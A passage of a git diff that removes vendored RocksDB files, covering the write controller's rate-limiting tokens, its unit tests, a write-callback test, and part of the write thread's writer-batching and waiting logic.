-
-              delete db;
-              DestroyDB(dbname, options);
-            }
-          }
-        }
-      }
-    }
-}
-}
-
-TEST_F(WriteCallbackTest, WriteCallBackTest) {
-  Options options;
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  DB* db;
-  DBImpl* db_impl;
-
-  DestroyDB(dbname, options);
-
-  options.create_if_missing = true;
-  Status s = DB::Open(options, dbname, &db);
-  ASSERT_OK(s);
-
-  db_impl = dynamic_cast<DBImpl*> (db);
-  ASSERT_TRUE(db_impl);
-
-  WriteBatch wb;
-
-  wb.Put("a", "value.a");
-  wb.Delete("x");
-
-  // Test a simple Write
-  s = db->Write(write_options, &wb);
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "a", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("value.a", value);
-
-  // Test WriteWithCallback
-  WriteCallbackTestWriteCallback1 callback1;
-  WriteBatch wb2;
-
-  wb2.Put("a", "value.a2");
-
-  s = db_impl->WriteWithCallback(write_options, &wb2, &callback1);
-  ASSERT_OK(s);
-  ASSERT_TRUE(callback1.was_called);
-
-  s = db->Get(read_options, "a", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("value.a2", value);
-
-  // Test WriteWithCallback for a callback that fails
-  WriteCallbackTestWriteCallback2 callback2;
-  WriteBatch wb3;
-
-  wb3.Put("a", "value.a3");
-
-  s = db_impl->WriteWithCallback(write_options, &wb3, &callback2);
-  ASSERT_NOK(s);
-
-  s = db->Get(read_options, "a", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("value.a2", value);
-
-  delete db;
-  DestroyDB(dbname, options);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr,
-          "SKIPPED as WriteWithCallback is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/write_controller.cc b/thirdparty/rocksdb/db/write_controller.cc
deleted file mode 100644
index 558aa72..0000000
--- a/thirdparty/rocksdb/db/write_controller.cc
+++ /dev/null
@@ -1,128 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "db/write_controller.h"
-
-#include <atomic>
-#include <cassert>
-#include <ratio>
-#include "rocksdb/env.h"
-
-namespace rocksdb {
-
-std::unique_ptr<WriteControllerToken> WriteController::GetStopToken() {
-  ++total_stopped_;
-  return std::unique_ptr<WriteControllerToken>(new StopWriteToken(this));
-}
-
-std::unique_ptr<WriteControllerToken> WriteController::GetDelayToken(
-    uint64_t write_rate) {
-  total_delayed_++;
-  // Reset counters.
-  last_refill_time_ = 0;
-  bytes_left_ = 0;
-  set_delayed_write_rate(write_rate);
-  return std::unique_ptr<WriteControllerToken>(new DelayWriteToken(this));
-}
-
-std::unique_ptr<WriteControllerToken>
-WriteController::GetCompactionPressureToken() {
-  ++total_compaction_pressure_;
-  return std::unique_ptr<WriteControllerToken>(
-      new CompactionPressureToken(this));
-}
-
-bool WriteController::IsStopped() const {
-  return total_stopped_.load(std::memory_order_relaxed) > 0;
-}
-// This is inside DB mutex, so we can't sleep and need to minimize
-// frequency to get time.
-// If it turns out to be a performance issue, we can redesign the thread
-// synchronization model here.
-// The function trust caller will sleep micros returned.
-uint64_t WriteController::GetDelay(Env* env, uint64_t num_bytes) {
-  if (total_stopped_.load(std::memory_order_relaxed) > 0) {
-    return 0;
-  }
-  if (total_delayed_.load(std::memory_order_relaxed) == 0) {
-    return 0;
-  }
-
-  const uint64_t kMicrosPerSecond = 1000000;
-  const uint64_t kRefillInterval = 1024U;
-
-  if (bytes_left_ >= num_bytes) {
-    bytes_left_ -= num_bytes;
-    return 0;
-  }
-  // The frequency to get time inside DB mutex is less than one per refill
-  // interval.
-  auto time_now = NowMicrosMonotonic(env);
-
-  uint64_t sleep_debt = 0;
-  uint64_t time_since_last_refill = 0;
-  if (last_refill_time_ != 0) {
-    if (last_refill_time_ > time_now) {
-      sleep_debt = last_refill_time_ - time_now;
-    } else {
-      time_since_last_refill = time_now - last_refill_time_;
-      bytes_left_ +=
-          static_cast<uint64_t>(static_cast<double>(time_since_last_refill) /
-                                kMicrosPerSecond * delayed_write_rate_);
-      if (time_since_last_refill >= kRefillInterval &&
-          bytes_left_ > num_bytes) {
-        // If refill interval already passed and we have enough bytes
-        // return without extra sleeping.
-        last_refill_time_ = time_now;
-        bytes_left_ -= num_bytes;
-        return 0;
-      }
-    }
-  }
-
-  uint64_t single_refill_amount =
-      delayed_write_rate_ * kRefillInterval / kMicrosPerSecond;
-  if (bytes_left_ + single_refill_amount >= num_bytes) {
-    // Wait until a refill interval
-    // Never trigger expire for less than one refill interval to avoid to get
-    // time.
-    bytes_left_ = bytes_left_ + single_refill_amount - num_bytes;
-    last_refill_time_ = time_now + kRefillInterval;
-    return kRefillInterval + sleep_debt;
-  }
-
-  // Need to refill more than one interval. Need to sleep longer. Check
-  // whether expiration will hit
-
-  // Sleep just until `num_bytes` is allowed.
-  uint64_t sleep_amount =
-      static_cast<uint64_t>(num_bytes /
-                            static_cast<long double>(delayed_write_rate_) *
-                            kMicrosPerSecond) +
-      sleep_debt;
-  last_refill_time_ = time_now + sleep_amount;
-  return sleep_amount;
-}
-
-uint64_t WriteController::NowMicrosMonotonic(Env* env) {
-  return env->NowNanos() / std::milli::den;
-}
-
-StopWriteToken::~StopWriteToken() {
-  assert(controller_->total_stopped_ >= 1);
-  --controller_->total_stopped_;
-}
-
-DelayWriteToken::~DelayWriteToken() {
-  controller_->total_delayed_--;
-  assert(controller_->total_delayed_.load() >= 0);
-}
-
-CompactionPressureToken::~CompactionPressureToken() {
-  controller_->total_compaction_pressure_--;
-  assert(controller_->total_compaction_pressure_ >= 0);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/write_controller.h b/thirdparty/rocksdb/db/write_controller.h
deleted file mode 100644
index 7c301ce..0000000
--- a/thirdparty/rocksdb/db/write_controller.h
+++ /dev/null
@@ -1,144 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <stdint.h>
-
-#include <atomic>
-#include <memory>
-#include "rocksdb/rate_limiter.h"
-
-namespace rocksdb {
-
-class Env;
-class WriteControllerToken;
-
-// WriteController is controlling write stalls in our write code-path. Write
-// stalls happen when compaction can't keep up with write rate.
-// All of the methods here (including WriteControllerToken's destructors) need
-// to be called while holding DB mutex
-class WriteController {
- public:
-  explicit WriteController(uint64_t _delayed_write_rate = 1024u * 1024u * 32u,
-                           int64_t low_pri_rate_bytes_per_sec = 1024 * 1024)
-      : total_stopped_(0),
-        total_delayed_(0),
-        total_compaction_pressure_(0),
-        bytes_left_(0),
-        last_refill_time_(0),
-        low_pri_rate_limiter_(
-            NewGenericRateLimiter(low_pri_rate_bytes_per_sec)) {
-    set_max_delayed_write_rate(_delayed_write_rate);
-  }
-  ~WriteController() = default;
-
-  // When an actor (column family) requests a stop token, all writes will be
-  // stopped until the stop token is released (deleted)
-  std::unique_ptr<WriteControllerToken> GetStopToken();
-  // When an actor (column family) requests a delay token, total delay for all
-  // writes to the DB will be controlled under the delayed write rate. Every
-  // write needs to call GetDelay() with number of bytes writing to the DB,
-  // which returns number of microseconds to sleep.
-  std::unique_ptr<WriteControllerToken> GetDelayToken(
-      uint64_t delayed_write_rate);
-  // When an actor (column family) requests a moderate token, compaction
-  // threads will be increased
-  std::unique_ptr<WriteControllerToken> GetCompactionPressureToken();
-
-  // these three metods are querying the state of the WriteController
-  bool IsStopped() const;
-  bool NeedsDelay() const { return total_delayed_.load() > 0; }
-  bool NeedSpeedupCompaction() const {
-    return IsStopped() || NeedsDelay() || total_compaction_pressure_ > 0;
-  }
-  // return how many microseconds the caller needs to sleep after the call
-  // num_bytes: how many number of bytes to put into the DB.
-  // Prerequisite: DB mutex held.
-  uint64_t GetDelay(Env* env, uint64_t num_bytes);
-  void set_delayed_write_rate(uint64_t write_rate) {
-    // avoid divide 0
-    if (write_rate == 0) {
-      write_rate = 1u;
-    } else if (write_rate > max_delayed_write_rate()) {
-      write_rate = max_delayed_write_rate();
-    }
-    delayed_write_rate_ = write_rate;
-  }
-
-  void set_max_delayed_write_rate(uint64_t write_rate) {
-    // avoid divide 0
-    if (write_rate == 0) {
-      write_rate = 1u;
-    }
-    max_delayed_write_rate_ = write_rate;
-    // update delayed_write_rate_ as well
-    delayed_write_rate_ = write_rate;
-  }
-
-  uint64_t delayed_write_rate() const { return delayed_write_rate_; }
-
-  uint64_t max_delayed_write_rate() const { return max_delayed_write_rate_; }
-
-  RateLimiter* low_pri_rate_limiter() { return low_pri_rate_limiter_.get(); }
-
- private:
-  uint64_t NowMicrosMonotonic(Env* env);
-
-  friend class WriteControllerToken;
-  friend class StopWriteToken;
-  friend class DelayWriteToken;
-  friend class CompactionPressureToken;
-
-  std::atomic<int> total_stopped_;
-  std::atomic<int> total_delayed_;
-  std::atomic<int> total_compaction_pressure_;
-  uint64_t bytes_left_;
-  uint64_t last_refill_time_;
-  // write rate set when initialization or by `DBImpl::SetDBOptions`
-  uint64_t max_delayed_write_rate_;
-  // current write rate
-  uint64_t delayed_write_rate_;
-
-  std::unique_ptr<RateLimiter> low_pri_rate_limiter_;
-};
-
-class WriteControllerToken {
- public:
-  explicit WriteControllerToken(WriteController* controller)
-      : controller_(controller) {}
-  virtual ~WriteControllerToken() {}
-
- protected:
-  WriteController* controller_;
-
- private:
-  // no copying allowed
-  WriteControllerToken(const WriteControllerToken&) = delete;
-  void operator=(const WriteControllerToken&) = delete;
-};
-
-class StopWriteToken : public WriteControllerToken {
- public:
-  explicit StopWriteToken(WriteController* controller)
-      : WriteControllerToken(controller) {}
-  virtual ~StopWriteToken();
-};
-
-class DelayWriteToken : public WriteControllerToken {
- public:
-  explicit DelayWriteToken(WriteController* controller)
-      : WriteControllerToken(controller) {}
-  virtual ~DelayWriteToken();
-};
-
-class CompactionPressureToken : public WriteControllerToken {
- public:
-  explicit CompactionPressureToken(WriteController* controller)
-      : WriteControllerToken(controller) {}
-  virtual ~CompactionPressureToken();
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/write_controller_test.cc b/thirdparty/rocksdb/db/write_controller_test.cc
deleted file mode 100644
index a1fe3fa..0000000
--- a/thirdparty/rocksdb/db/write_controller_test.cc
+++ /dev/null
@@ -1,135 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include <ratio>
-
-#include "db/write_controller.h"
-
-#include "rocksdb/env.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class WriteControllerTest : public testing::Test {};
-
-class TimeSetEnv : public EnvWrapper {
- public:
-  explicit TimeSetEnv() : EnvWrapper(nullptr) {}
-  uint64_t now_micros_ = 6666;
-  virtual uint64_t NowNanos() override { return now_micros_ * std::milli::den; }
-};
-
-TEST_F(WriteControllerTest, ChangeDelayRateTest) {
-  TimeSetEnv env;
-  WriteController controller(40000000u);  // also set max delayed rate
-  controller.set_delayed_write_rate(10000000u);
-  auto delay_token_0 =
-      controller.GetDelayToken(controller.delayed_write_rate());
-  ASSERT_EQ(static_cast<uint64_t>(2000000),
-            controller.GetDelay(&env, 20000000u));
-  auto delay_token_1 = controller.GetDelayToken(2000000u);
-  ASSERT_EQ(static_cast<uint64_t>(10000000),
-            controller.GetDelay(&env, 20000000u));
-  auto delay_token_2 = controller.GetDelayToken(1000000u);
-  ASSERT_EQ(static_cast<uint64_t>(20000000),
-            controller.GetDelay(&env, 20000000u));
-  auto delay_token_3 = controller.GetDelayToken(20000000u);
-  ASSERT_EQ(static_cast<uint64_t>(1000000),
-            controller.GetDelay(&env, 20000000u));
-  // This is more than max rate. Max delayed rate will be used.
-  auto delay_token_4 =
-      controller.GetDelayToken(controller.delayed_write_rate() * 3);
-  ASSERT_EQ(static_cast<uint64_t>(500000),
-            controller.GetDelay(&env, 20000000u));
-}
-
-TEST_F(WriteControllerTest, SanityTest) {
-  WriteController controller(10000000u);
-  auto stop_token_1 = controller.GetStopToken();
-  auto stop_token_2 = controller.GetStopToken();
-
-  ASSERT_TRUE(controller.IsStopped());
-  stop_token_1.reset();
-  ASSERT_TRUE(controller.IsStopped());
-  stop_token_2.reset();
-  ASSERT_FALSE(controller.IsStopped());
-
-  TimeSetEnv env;
-
-  auto delay_token_1 = controller.GetDelayToken(10000000u);
-  ASSERT_EQ(static_cast<uint64_t>(2000000),
-            controller.GetDelay(&env, 20000000u));
-
-  env.now_micros_ += 1999900u;  // sleep debt 1000
-
-  auto delay_token_2 = controller.GetDelayToken(10000000u);
-  // Rate reset after changing the token.
-  ASSERT_EQ(static_cast<uint64_t>(2000000),
-            controller.GetDelay(&env, 20000000u));
-
-  env.now_micros_ += 1999900u;  // sleep debt 1000
-
-  // One refill: 10240 bytes allowed, 1000 used, 9240 left
-  ASSERT_EQ(static_cast<uint64_t>(1124), controller.GetDelay(&env, 1000u));
-  env.now_micros_ += 1124u;  // sleep debt 0
-
-  delay_token_2.reset();
-  // 1000 used, 8240 left
-  ASSERT_EQ(static_cast<uint64_t>(0), controller.GetDelay(&env, 1000u));
-
-  env.now_micros_ += 100u;  // sleep credit 100
-  // 1000 used, 7240 left
-  ASSERT_EQ(static_cast<uint64_t>(0), controller.GetDelay(&env, 1000u));
-
-  env.now_micros_ += 100u;  // sleep credit 200
-  // One refill: 10240 fileed, sleep credit generates 2000. 8000 used
-  //             7240 + 10240 + 2000 - 8000 = 11480 left
-  ASSERT_EQ(static_cast<uint64_t>(1024u), controller.GetDelay(&env, 8000u));
-
-  env.now_micros_ += 200u;  // sleep debt 824
-  // 1000 used, 10480 left.
-  ASSERT_EQ(static_cast<uint64_t>(0), controller.GetDelay(&env, 1000u));
-
-  env.now_micros_ += 200u;  // sleep debt 624
-  // Out of bound sleep, still 10480 left
-  ASSERT_EQ(static_cast<uint64_t>(3000624u),
-            controller.GetDelay(&env, 30000000u));
-
-  env.now_micros_ += 3000724u;  // sleep credit 100
-  // 6000 used, 4480 left.
-  ASSERT_EQ(static_cast<uint64_t>(0), controller.GetDelay(&env, 6000u));
-
-  env.now_micros_ += 200u;  // sleep credit 300
-  // One refill, credit 4480 balance + 3000 credit + 10240 refill
-  // Use 8000, 9720 left
-  ASSERT_EQ(static_cast<uint64_t>(1024u), controller.GetDelay(&env, 8000u));
-
-  env.now_micros_ += 3024u;  // sleep credit 2000
-
-  // 1720 left
-  ASSERT_EQ(static_cast<uint64_t>(0u), controller.GetDelay(&env, 8000u));
-
-  // 1720 balance + 20000 credit = 20170 left
-  // Use 8000, 12170 left
-  ASSERT_EQ(static_cast<uint64_t>(0u), controller.GetDelay(&env, 8000u));
-
-  // 4170 left
-  ASSERT_EQ(static_cast<uint64_t>(0u), controller.GetDelay(&env, 8000u));
-
-  // Need a refill
-  ASSERT_EQ(static_cast<uint64_t>(1024u), controller.GetDelay(&env, 9000u));
-
-  delay_token_1.reset();
-  ASSERT_EQ(static_cast<uint64_t>(0), controller.GetDelay(&env, 30000000u));
-  delay_token_1.reset();
-  ASSERT_FALSE(controller.IsStopped());
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/write_thread.cc b/thirdparty/rocksdb/db/write_thread.cc
deleted file mode 100644
index 2d3b346..0000000
--- a/thirdparty/rocksdb/db/write_thread.cc
+++ /dev/null
@@ -1,656 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "db/write_thread.h"
-#include <chrono>
-#include <thread>
-#include "db/column_family.h"
-#include "port/port.h"
-#include "util/random.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-WriteThread::WriteThread(const ImmutableDBOptions& db_options)
-    : max_yield_usec_(db_options.enable_write_thread_adaptive_yield
-                          ? db_options.write_thread_max_yield_usec
-                          : 0),
-      slow_yield_usec_(db_options.write_thread_slow_yield_usec),
-      allow_concurrent_memtable_write_(
-          db_options.allow_concurrent_memtable_write),
-      enable_pipelined_write_(db_options.enable_pipelined_write),
-      newest_writer_(nullptr),
-      newest_memtable_writer_(nullptr),
-      last_sequence_(0) {}
-
-uint8_t WriteThread::BlockingAwaitState(Writer* w, uint8_t goal_mask) {
-  // We're going to block.  Lazily create the mutex.  We guarantee
-  // propagation of this construction to the waker via the
-  // STATE_LOCKED_WAITING state.  The waker won't try to touch the mutex
-  // or the condvar unless they CAS away the STATE_LOCKED_WAITING that
-  // we install below.
-  w->CreateMutex();
-
-  auto state = w->state.load(std::memory_order_acquire);
-  assert(state != STATE_LOCKED_WAITING);
-  if ((state & goal_mask) == 0 &&
-      w->state.compare_exchange_strong(state, STATE_LOCKED_WAITING)) {
-    // we have permission (and an obligation) to use StateMutex
-    std::unique_lock<std::mutex> guard(w->StateMutex());
-    w->StateCV().wait(guard, [w] {
-      return w->state.load(std::memory_order_relaxed) != STATE_LOCKED_WAITING;
-    });
-    state = w->state.load(std::memory_order_relaxed);
-  }
-  // else tricky.  Goal is met or CAS failed.  In the latter case the waker
-  // must have changed the state, and compare_exchange_strong has updated
-  // our local variable with the new one.  At the moment WriteThread never
-  // waits for a transition across intermediate states, so we know that
-  // since a state change has occurred the goal must have been met.
-  assert((state & goal_mask) != 0);
-  return state;
-}
-
-uint8_t WriteThread::AwaitState(Writer* w, uint8_t goal_mask,
-                                AdaptationContext* ctx) {
-  uint8_t state;
-
-  // 1. Busy loop using "pause" for 1 micro sec
-  // 2. Else SOMETIMES busy loop using "yield" for 100 micro sec (default)
-  // 3. Else blocking wait
-
-  // On a modern Xeon each loop takes about 7 nanoseconds (most of which
-  // is the effect of the pause instruction), so 200 iterations is a bit
-  // more than a microsecond.  This is long enough that waits longer than
-  // this can amortize the cost of accessing the clock and yielding.
-  for (uint32_t tries = 0; tries < 200; ++tries) {
-    state = w->state.load(std::memory_order_acquire);
-    if ((state & goal_mask) != 0) {
-      return state;
-    }
-    port::AsmVolatilePause();
-  }
-
-  // If we're only going to end up waiting a short period of time,
-  // it can be a lot more efficient to call std::this_thread::yield()
-  // in a loop than to block in StateMutex().  For reference, on my 4.0
-  // SELinux test server with support for syscall auditing enabled, the
-  // minimum latency between FUTEX_WAKE to returning from FUTEX_WAIT is
-  // 2.7 usec, and the average is more like 10 usec.  That can be a big
-  // drag on RockDB's single-writer design.  Of course, spinning is a
-  // bad idea if other threads are waiting to run or if we're going to
-  // wait for a long time.  How do we decide?
-  //
-  // We break waiting into 3 categories: short-uncontended,
-  // short-contended, and long.  If we had an oracle, then we would always
-  // spin for short-uncontended, always block for long, and our choice for
-  // short-contended might depend on whether we were trying to optimize
-  // RocksDB throughput or avoid being greedy with system resources.
-  //
-  // Bucketing into short or long is easy by measuring elapsed time.
-  // Differentiating short-uncontended from short-contended is a bit
-  // trickier, but not too bad.  We could look for involuntary context
-  // switches using getrusage(RUSAGE_THREAD, ..), but it's less work
-  // (portability code and CPU) to just look for yield calls that take
-  // longer than we expect.  sched_yield() doesn't actually result in any
-  // context switch overhead if there are no other runnable processes
-  // on the current core, in which case it usually takes less than
-  // a microsecond.
-  //
-  // There are two primary tunables here: the threshold between "short"
-  // and "long" waits, and the threshold at which we suspect that a yield
-  // is slow enough to indicate we should probably block.  If these
-  // thresholds are chosen well then CPU-bound workloads that don't
-  // have more threads than cores will experience few context switches
-  // (voluntary or involuntary), and the total number of context switches
-  // (voluntary and involuntary) will not be dramatically larger (maybe
-  // 2x) than the number of voluntary context switches that occur when
-  // --max_yield_wait_micros=0.
-  //
-  // There's another constant, which is the number of slow yields we will
-  // tolerate before reversing our previous decision.  Solitary slow
-  // yields are pretty common (low-priority small jobs ready to run),
-  // so this should be at least 2.  We set this conservatively to 3 so
-  // that we can also immediately schedule a ctx adaptation, rather than
-  // waiting for the next update_ctx.
-
-  const size_t kMaxSlowYieldsWhileSpinning = 3;
-
-  // Whether the yield approach has any credit in this context. The credit is
-  // added by yield being succesfull before timing out, and decreased otherwise.
-  auto& yield_credit = ctx->value;
-  // Update the yield_credit based on sample runs or right after a hard failure
-  bool update_ctx = false;
-  // Should we reinforce the yield credit
-  bool would_spin_again = false;
-  // The samling base for updating the yeild credit. The sampling rate would be
-  // 1/sampling_base.
-  const int sampling_base = 256;
-
-  if (max_yield_usec_ > 0) {
-    update_ctx = Random::GetTLSInstance()->OneIn(sampling_base);
-
-    if (update_ctx || yield_credit.load(std::memory_order_relaxed) >= 0) {
-      // we're updating the adaptation statistics, or spinning has >
-      // 50% chance of being shorter than max_yield_usec_ and causing no
-      // involuntary context switches
-      auto spin_begin = std::chrono::steady_clock::now();
-
-      // this variable doesn't include the final yield (if any) that
-      // causes the goal to be met
-      size_t slow_yield_count = 0;
-
-      auto iter_begin = spin_begin;
-      while ((iter_begin - spin_begin) <=
-             std::chrono::microseconds(max_yield_usec_)) {
-        std::this_thread::yield();
-
-        state = w->state.load(std::memory_order_acquire);
-        if ((state & goal_mask) != 0) {
-          // success
-          would_spin_again = true;
-          break;
-        }
-
-        auto now = std::chrono::steady_clock::now();
-        if (now == iter_begin ||
-            now - iter_begin >= std::chrono::microseconds(slow_yield_usec_)) {
-          // conservatively count it as a slow yield if our clock isn't
-          // accurate enough to measure the yield duration
-          ++slow_yield_count;
-          if (slow_yield_count >= kMaxSlowYieldsWhileSpinning) {
-            // Not just one ivcsw, but several.  Immediately update yield_credit
-            // and fall back to blocking
-            update_ctx = true;
-            break;
-          }
-        }
-        iter_begin = now;
-      }
-    }
-  }
-
-  if ((state & goal_mask) == 0) {
-    state = BlockingAwaitState(w, goal_mask);
-  }
-
-  if (update_ctx) {
-    // Since our update is sample based, it is ok if a thread overwrites the
-    // updates by other threads. Thus the update does not have to be atomic.
-    auto v = yield_credit.load(std::memory_order_relaxed);
-    // fixed point exponential decay with decay constant 1/1024, with +1
-    // and -1 scaled to avoid overflow for int32_t
-    //
-    // On each update the positive credit is decayed by a facor of 1/1024 (i.e.,
-    // 0.1%). If the sampled yield was successful, the credit is also increased
-    // by X. Setting X=2^17 ensures that the credit never exceeds
-    // 2^17*2^10=2^27, which is lower than 2^31 the upperbound of int32_t. Same
-    // logic applies to negative credits.
-    v = v - (v / 1024) + (would_spin_again ? 1 : -1) * 131072;
-    yield_credit.store(v, std::memory_order_relaxed);
-  }
-
-  assert((state & goal_mask) != 0);
-  return state;
-}
-
-void WriteThread::SetState(Writer* w, uint8_t new_state) {
-  auto state = w->state.load(std::memory_order_acquire);
-  if (state == STATE_LOCKED_WAITING ||
-      !w->state.compare_exchange_strong(state, new_state)) {
-    assert(state == STATE_LOCKED_WAITING);
-
-    std::lock_guard<std::mutex> guard(w->StateMutex());
-    assert(w->state.load(std::memory_order_relaxed) != new_state);
-    w->state.store(new_state, std::memory_order_relaxed);
-    w->StateCV().notify_one();
-  }
-}
-
-bool WriteThread::LinkOne(Writer* w, std::atomic<Writer*>* newest_writer) {
-  assert(newest_writer != nullptr);
-  assert(w->state == STATE_INIT);
-  Writer* writers = newest_writer->load(std::memory_order_relaxed);
-  while (true) {
-    w->link_older = writers;
-    if (newest_writer->compare_exchange_weak(writers, w)) {
-      return (writers == nullptr);
-    }
-  }
-}
-
-bool WriteThread::LinkGroup(WriteGroup& write_group,
-                            std::atomic<Writer*>* newest_writer) {
-  assert(newest_writer != nullptr);
-  Writer* leader = write_group.leader;
-  Writer* last_writer = write_group.last_writer;
-  Writer* w = last_writer;
-  while (true) {
-    // Unset link_newer pointers to make sure when we call
-    // CreateMissingNewerLinks later it create all missing links.
-    w->link_newer = nullptr;
-    w->write_group = nullptr;
-    if (w == leader) {
-      break;
-    }
-    w = w->link_older;
-  }
-  Writer* newest = newest_writer->load(std::memory_order_relaxed);
-  while (true) {
-    leader->link_older = newest;
-    if (newest_writer->compare_exchange_weak(newest, last_writer)) {
-      return (newest == nullptr);
-    }
-  }
-}
-
-void WriteThread::CreateMissingNewerLinks(Writer* head) {
-  while (true) {
-    Writer* next = head->link_older;
-    if (next == nullptr || next->link_newer != nullptr) {
-      assert(next == nullptr || next->link_newer == head);
-      break;
-    }
-    next->link_newer = head;
-    head = next;
-  }
-}
-
-void WriteThread::CompleteLeader(WriteGroup& write_group) {
-  assert(write_group.size > 0);
-  Writer* leader = write_group.leader;
-  if (write_group.size == 1) {
-    write_group.leader = nullptr;
-    write_group.last_writer = nullptr;
-  } else {
-    assert(leader->link_newer != nullptr);
-    leader->link_newer->link_older = nullptr;
-    write_group.leader = leader->link_newer;
-  }
-  write_group.size -= 1;
-  SetState(leader, STATE_COMPLETED);
-}
-
-void WriteThread::CompleteFollower(Writer* w, WriteGroup& write_group) {
-  assert(write_group.size > 1);
-  assert(w != write_group.leader);
-  if (w == write_group.last_writer) {
-    w->link_older->link_newer = nullptr;
-    write_group.last_writer = w->link_older;
-  } else {
-    w->link_older->link_newer = w->link_newer;
-    w->link_newer->link_older = w->link_older;
-  }
-  write_group.size -= 1;
-  SetState(w, STATE_COMPLETED);
-}
-
-static WriteThread::AdaptationContext jbg_ctx("JoinBatchGroup");
-void WriteThread::JoinBatchGroup(Writer* w) {
-  TEST_SYNC_POINT_CALLBACK("WriteThread::JoinBatchGroup:Start", w);
-  assert(w->batch != nullptr);
-
-  bool linked_as_leader = LinkOne(w, &newest_writer_);
-  if (linked_as_leader) {
-    SetState(w, STATE_GROUP_LEADER);
-  }
-
-  TEST_SYNC_POINT_CALLBACK("WriteThread::JoinBatchGroup:Wait", w);
-
-  if (!linked_as_leader) {
-    /**
-     * Wait util:
-     * 1) An existing leader pick us as the new leader when it finishes
-     * 2) An existing leader pick us as its follewer and
-     * 2.1) finishes the memtable writes on our behalf
-     * 2.2) Or tell us to finish the memtable writes in pralallel
-     * 3) (pipelined write) An existing leader pick us as its follower and
-     *    finish book-keeping and WAL write for us, enqueue us as pending
-     *    memtable writer, and
-     * 3.1) we become memtable writer group leader, or
-     * 3.2) an existing memtable writer group leader tell us to finish memtable
-     *      writes in parallel.
-     */
-    AwaitState(w, STATE_GROUP_LEADER | STATE_MEMTABLE_WRITER_LEADER |
-                      STATE_PARALLEL_MEMTABLE_WRITER | STATE_COMPLETED,
-               &jbg_ctx);
-    TEST_SYNC_POINT_CALLBACK("WriteThread::JoinBatchGroup:DoneWaiting", w);
-  }
-}
-
-size_t WriteThread::EnterAsBatchGroupLeader(Writer* leader,
-                                            WriteGroup* write_group) {
-  assert(leader->link_older == nullptr);
-  assert(leader->batch != nullptr);
-  assert(write_group != nullptr);
-
-  size_t size = WriteBatchInternal::ByteSize(leader->batch);
-
-  // Allow the group to grow up to a maximum size, but if the
-  // original write is small, limit the growth so we do not slow
-  // down the small write too much.
-  size_t max_size = 1 << 20;
-  if (size <= (128 << 10)) {
-    max_size = size + (128 << 10);
-  }
-
-  leader->write_group = write_group;
-  write_group->leader = leader;
-  write_group->last_writer = leader;
-  write_group->size = 1;
-  Writer* newest_writer = newest_writer_.load(std::memory_order_acquire);
-
-  // This is safe regardless of any db mutex status of the caller. Previous
-  // calls to ExitAsGroupLeader either didn't call CreateMissingNewerLinks
-  // (they emptied the list and then we added ourself as leader) or had to
-  // explicitly wake us up (the list was non-empty when we added ourself,
-  // so we have already received our MarkJoined).
-  CreateMissingNewerLinks(newest_writer);
-
-  // Tricky. Iteration start (leader) is exclusive and finish
-  // (newest_writer) is inclusive. Iteration goes from old to new.
-  Writer* w = leader;
-  while (w != newest_writer) {
-    w = w->link_newer;
-
-    if (w->sync && !leader->sync) {
-      // Do not include a sync write into a batch handled by a non-sync write.
-      break;
-    }
-
-    if (w->no_slowdown != leader->no_slowdown) {
-      // Do not mix writes that are ok with delays with the ones that
-      // request fail on delays.
-      break;
-    }
-
-    if (!w->disable_wal && leader->disable_wal) {
-      // Do not include a write that needs WAL into a batch that has
-      // WAL disabled.
-      break;
-    }
-
-    if (w->batch == nullptr) {
-      // Do not include those writes with nullptr batch. Those are not writes,
-      // those are something else. They want to be alone
-      break;
-    }
-
-    if (w->callback != nullptr && !w->callback->AllowWriteBatching()) {
-      // dont batch writes that don't want to be batched
-      break;
-    }
-
-    auto batch_size = WriteBatchInternal::ByteSize(w->batch);
-    if (size + batch_size > max_size) {
-      // Do not make batch too big
-      break;
-    }
-
-    w->write_group = write_group;
-    size += batch_size;
-    write_group->last_writer = w;
-    write_group->size++;
-  }
-  return size;
-}
-
-void WriteThread::EnterAsMemTableWriter(Writer* leader,
-                                        WriteGroup* write_group) {
-  assert(leader != nullptr);
-  assert(leader->link_older == nullptr);
-  assert(leader->batch != nullptr);
-  assert(write_group != nullptr);
-
-  size_t size = WriteBatchInternal::ByteSize(leader->batch);
-
-  // Allow the group to grow up to a maximum size, but if the
-  // original write is small, limit the growth so we do not slow
-  // down the small write too much.
-  size_t max_size = 1 << 20;
-  if (size <= (128 << 10)) {
-    max_size = size + (128 << 10);
-  }
-
-  leader->write_group = write_group;
-  write_group->leader = leader;
-  write_group->size = 1;
-  Writer* last_writer = leader;
-
